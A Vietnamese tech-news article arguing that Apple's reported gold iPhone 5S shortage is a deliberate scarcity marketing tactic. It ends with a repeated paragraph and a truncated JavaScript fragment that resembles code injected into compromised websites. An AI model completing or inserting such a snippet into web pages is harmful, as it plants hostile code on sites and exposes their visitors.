Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > iPhone 5S vàng khan hàng chỉ là chiêu trò của Apple

iPhone 5S vàng khan hàng chỉ là chiêu trò của Apple

Apple cho biết rất nhiều cửa hàng bán iPhone và nhiều nhà mạng đang lâm vào tình trạng đã bán hết sạch các sản phẩm iPhone 5S màu vàng. Tuy nhiên, theo Business Insider, có rất nhiều lý do thuyết phục để cho thấy đây chỉ là một chiêu marketing của Apple mà thôi.

iPhone 5S màu vàng

Hiện nay, các hãng tin tức và trang CNTT trên thế giới cũng đưa iPhone vàng đang thiếu hàng. Điều này thật sự rất vô lý, iPhone 5S vàng không phải được làm từ vàng thật, nó chỉ được làm từ loại nhôm oxit hóa anot (anodize) màu vàng. Giá của nhôm đã thực sự giảm xuống trong năm mà Apple bắt đầu lên kế hoạch nguồn cung cho sản phẩm này – vì vậy ý tưởng cho rằng, có thể Apple đang gặp phải tình cảnh thiếu nguyên liệu để sản xuất phiên bản màu vàng này thật sự rất ngớ ngẩn.

Các chuyên gia marketing của Apple không phải đều là những kẻ ngốc. Họ có thể ước tính nhu cầu trước khi tung ra một sản phẩm mới vào thị trường. Bằng chứng là không hề thiếu hụt mẫu iPhone 5C, và đã không có ai phàn nàn rằng là họ không thể mua iPhone 5C.

Mức giá của các hợp đồng mua nhựa công nghiệp đã tăng lên. Trong khi đó, giá của mẫu nhựa polycarbonate trong iPhone 5C được bán không quá 7 USD/pound. Và Apple vẫn đáp ứng được lượng nhu cầu người mua sản phẩm.

Trong khi đó, theo Apple thì hiện nay iPhone 5S màu vàng đã hết hàng tại nhiều nơi trên thế giới, như nhà mạng O2 tại Châu Âu đã không còn hàng nữa, nhà mạng Verizon của Mỹ cũng không còn iPhone màu vàng nữa, toàn bộ châu lục Australia cũng không có hàng nữa, tại cửa hàng lớn của Apple ở San Francisco cũng chỉ có 20 mẫu iPhone màu vàng. Tại Châu Á, nhu cầu mua sản phẩm cũng rất lớn và hiện tại cũng đã hết hàng.

Giá của nhôm đã giảm xuống

Apple thực sự đã tính toán nhầm nhu cầu của người dùng?

Làm sao chúng ta có thể tin được Apple lại mắc một lỗi đơn giản như vậy được? Trên thực tế, đây là một công ty được mệnh danh là nhà marketing chuyên nghiệp, đẳng cấp của thế giới. Apple còn là một chủ đề trong các đề tài nghiên cứu về marketing của trường Đại học Kinh doanh Harvard.

Chắc chắn, đây không phải là một sự tính toán nhầm lẫn nào về nguồn cung hàng. Business Insider cho biết, họ đã gửi email đến Apple để hỏi bình luận của nhà sản xuất smartphone lớn nhất thế giới về vấn đề này nhưng vẫn chưa được hồi âm.

Trong khi đó, sự vắng mặt của iPhone 5S màu vàng đang tạo ra một cơn sốt, một tiếng vang lớn hơn bất cứ chiến dịch quảng cáo marketing nào mà Apple có thể thực hiện. iPhone màu vàng đã được rao bán với mức giá 1800 uSD trên eBay, đắt hơn rất nhiều so với mức giá thực của sản phẩm. Thậm chí, trang Atlantic còn nhấn mạnh rằng chỉ sau 24h bán ra, việc sở hữu iPhone màn vàng đã trở thành một nghệ thuật quảng cáo xã hội vang dội. Và trước đó, Business Insider đã dự đoán rằng iPhone màu vàng có thể sẽ chia thế giới thành 2 mảng: có và không có iPhone.

Đây chính xác là một chiêu tiếp thị kiểu “dây thừng nhung” của nhà Táo. Nếu bạn đã từng đến câu lạc bộ đêm thì bạn sẽ biết. Các câu lạc bộ đêm rất giống nhau. Ngay cả những nơi cao cấp nhất thì về cơ bản vẫn là bạn phải trả tiền để bước vào một không gian ồn ào, đông đúc, tối và rộng rãi với những ánh đến nhấp nháy và đồ uống siêu đắt đỏ. Điều này rất bình thường, nhưng nếu có một hàng người xếp hàng bên ngoài và mọi người phải trật tự đứng đằng sau một dây thừng nhung để đi vào, câu lạc bộ đó sẽ trở nên rất hấp dẫn.

Đó là những gì đang diễn ra đối với iPhone 5S màu vàng, bạn mong đợi nó nhưng bạn chưa thể có nó trong lúc này, và đấy là lý do vì sao bạn lại muốn sở hữu nó.

Đó là những gì đang diễn ra với iPhone vàng, bạn mong đợi nó nhưng bạn chưa thể có nó trong tay ngay lúc này, và đó là lí do tại sao bạn muốn sở hữu nó. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘